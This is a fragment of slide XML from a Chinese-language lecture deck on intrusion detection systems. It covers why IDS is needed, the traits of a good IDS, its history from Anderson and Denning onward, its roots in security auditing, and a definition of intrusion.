            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDS : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Intrusion Detection System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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EB11E720-BC5D-41EA-96D3-EE9B4E5BD421}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>存在与发展的必然性</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96259" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D1584D5-F65B-4D5D-8CC4-BA0FCBE6014B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2209800"/>
            <a:ext cx="8001000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>一、网络攻击的破坏性、损失的严重性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>二、日益增长的网络安全威胁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>三、单纯的防火墙无法防范复杂多变的攻击</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30072DAA-3BD5-462D-AF7A-4401D01F8FF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵检测的特点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97283" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F68B7EE-B0C5-45ED-BAD4-11C62C9C343C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="2286000"/>
            <a:ext cx="7772400" cy="2895600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>一个完善的入侵检测系统的特点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>经济性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>时效性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>安全性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>可扩展性</a:t>
            </a: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Text Box 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{352E3DC3-71B7-49CA-9FA3-92609B1D5F57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2438400"/>
            <a:ext cx="7696200" cy="319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2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1980</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>年  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Anderson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>提出：入侵检测概念，分类方法</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1987</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>年  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Denning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>提出了一种通用的入侵检测模型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>独立性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>  ：系统、环境、脆弱性、入侵种类 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>系统框架</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>：异常检测器，专家系统 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>90</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>年初：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>CMDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>™</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>NetProwler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>™</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>NetRanger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>™</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>        ISS RealSecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>™</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98307" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{321BB631-47A7-43BB-BD09-6C30E6B9CB80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>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4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵检测起源</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9B9CD735-F2BF-473E-B03F-3EB2528AE6AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵检测的起源（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99331" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77ED42B9-E656-41CB-8A4B-95D61CB26D41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2209800"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>审计技术：产生、记录并检查按时间顺序排列的系统事件记录的过程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>审计的目标：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>确定和保持系统活动中每个人的责任</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>重建事件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>评估损失</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>监测系统的问题区</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>提供有效的灾难恢复</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>阻止系统的不正当使用</a:t>
            </a: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AE495C12-DA1C-4B8D-B1EF-EE1F4EB8B258}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵检测的起源（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100355" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83F27EA2-34C6-4D9B-B094-EB55D33EC8B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="2133600"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>计算机安全和审计</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>美国国防部在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>70</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>年代支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>可信信息系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>的研究，最终将审计机制纳入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>可信计算机系统评估准则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>》</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>TCSEC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>C2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>级以上系统的要求的一部分</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>褐皮书</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>理解可信系统中的审计指南</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>》</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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854A9160-CDBE-456D-92ED-C7AE6E4D4836}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1、入侵 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Intrusion)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C128966F-E665-4F8C-AC4A-696DBE43EF41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="1844675"/>
            <a:ext cx="7486650" cy="3794125"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>入侵是指未经授权蓄意尝试访问信息、窜改信息，使系统不可靠或不能使用的行为。它企图破坏计算机资源的：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>完整性(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>机密性（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Confidentiality）</a:t>
            </a:r>
